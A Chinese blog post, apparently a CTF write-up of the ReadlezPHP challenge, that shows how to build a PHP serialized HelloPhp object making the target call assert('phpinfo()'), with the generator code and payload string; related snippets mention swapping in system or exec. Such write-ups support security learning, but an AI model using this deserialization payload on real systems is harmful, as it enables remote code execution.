【反序列化】ReadlezPHP

最新推荐文章于 2025-02-18 15:46:33 发布
最新推荐文章于 2025-02-18 15:46:33 发布
阅读量274 收藏
点赞数
分类专栏: 反序列化 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/serendipity1130/article/details/121317847
版权
本文探讨了如何在无法直接右键查看网页源代码的情况下,通过在URL中输入`view-source`来检查页面内容。进一步,文章讲解了一个PHP反序列化的过程,展示了如何构造一个利用`HelloPhp`类的`assert`函数来执行`phpinfo()`的序列化字符串。这涉及到PHP安全中的反序列化漏洞利用技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.打开网页,无法右键查看源代码,在url中输入view-source查看:

2. 进入time.php?source查看到反序列化函数:

 3.可以读取到echo的结果是$b($a),构造序列化函数:

<?php
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = 'phpinfo()';
        $this->b = "assert";
    }
}
$c=new HelloPhp;
echo serialize($c);

//O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

[NPUCTF2020]ReadlezPHP
missht0的博客
01-30 343
[NPUCTF2020]ReadlezPHP 在源码里面搜索php,搜到一个 访问后是源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __de
序列化和反序列化刷题记录
一只菜鸡
01-28 1761
BUU CODE REVIEW\ *反序列化 md5 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try {
mysql inner join 和join_mysql中的7种联表join
weixin_39703773的博客
12-01 162
建表在这里呢我们先来建立两张有外键关联的张表。CREATE DATABASE db0206;USE db0206;CREATE TABLE `db0206`.`tbl_dept`( `id` INT(11) NOT NULL AUTO_INCREMENT, `deptName` VARCHAR(30), `locAdd` VARCHAR(40), PRIMARY KEY (`id...
buuctf ReadlezPHP
09-16
通过输入不同的反序列化数据可以执行不同的函数。其中可用的函数有`system`、`assert`、`shell_exec`、`exec`。代码中给出了一些例子,比如`$c = new HelloPhp; echo serialize($x);`可以执行`system(phpinfo())...
BUUCTF__web题解合集(九)
风过江南乱的博客
09-23 1192
1、[GYCTF2020]FlaskApp 2、[NPUCTF2020]ReadlezPHP 3、[MRCTF2020]Ezpop 4、[极客大挑战 2019]RCE ME 5、[CISCN2019 总决赛 Day2 Web1]Easyweb、
buuctf.web 32-64
最新发布
m0_73889365的博客
02-18 906
buuctf.web 刷题
BUUCTF--ReadlezPHP反序列化简单应用)()
cainiao17441898的博客
08-15 294
目录扫描之后发现没有文件泄露。 查看一下源码发现了两个链接。 源码: PHP魔术方法:magic 这里eval没有用了不知道为啥(可能被过滤了吧)。 这里用了assert截断函数(作用跟eval差不多,eval里面的语句要以;结尾) 这里用蚁剑连接会连不上,就先查看一下phpinfo的信息。 生成payload: <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值